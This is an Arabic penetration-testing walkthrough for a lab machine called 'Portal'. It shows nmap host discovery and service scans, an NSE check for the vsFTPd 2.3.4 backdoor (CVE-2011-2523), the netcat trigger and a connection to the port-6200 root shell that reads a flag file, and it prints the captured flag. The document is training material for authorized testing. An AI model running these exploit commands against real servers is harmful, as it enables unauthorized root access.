
دليل تفصيلي لاختبار الاختراق وتقرير استغلال لجهاز 'Portal'، مع التركيز على CVE-2011-2523 (ثغرة vsFTPd 2.3.4 الخلفية) للحصول على صلاحيات الجذر (root).
⚠️ هذا المشروع مخصص لأغراض تعليمية واختبارية مرخصة فقط.
الوصول غير المصرح به إلى الأنظمة محظور تمامًا.
سيافيق
الدور: مختبر اختراق رئيسي
| المرحلة | الأداة | الوصف |
|---|---|---|
| الاكتشاف | Nmap | مسح الشبكة للعثور على الأجهزة النشطة |
| التعداد | Nmap | تحديد الخدمات والإصدارات |
| التحليل | NSE Script | كشف الثغرة المعروفة |
| الاستغلال | Netcat | تشغيل الباب الخلفي |
| ما بعد الاستغلال | Terminal | الحصول على صلاحيات الجذر واسترجاع العلم |
مسح الأجهزة النشطة في الشبكة:
nmap -sn --unprivileged 10.150.150.10-30
✅ النتيجة:
مسح المنافذ والخدمات المفتوحة:
nmap -Pn -F --unprivileged -sV 10.150.150.12
✅ النتائج:
التحقق من وجود ثغرة الباب الخلفي المعروفة في FTP:
nmap -Pn --unprivileged -p21 --script ftp-vsftpd-backdoor 10.150.150.12
🚨 النتيجة:
تشغيل الباب الخلفي باستخدام اسم مستخدم ضار:
(echo "USER hello:)"; echo "PASS password"; sleep 1) | nc -nv 10.150.150.12 21
⚡ هذا يفتح واجهة أوامر مخفية بصلاحيات الجذر على المنفذ 6200
الاتصال بالباب الخلفي وتنفيذ الأوامر:
(echo "id; cat /root/FLAG1.txt"; sleep 1) | nc -nv 10.150.150.12 6200
🏁 تم التقاط العلم:
5ee499eb5d0b8e4269b13483e57adaa0b3815f48
❌ لا تستخدم هذه المعرفة في أنشطة غير قانونية.
"الأمان ليس منتجًا، بل عملية." — اختبر وراقب وحسّن دائمًا.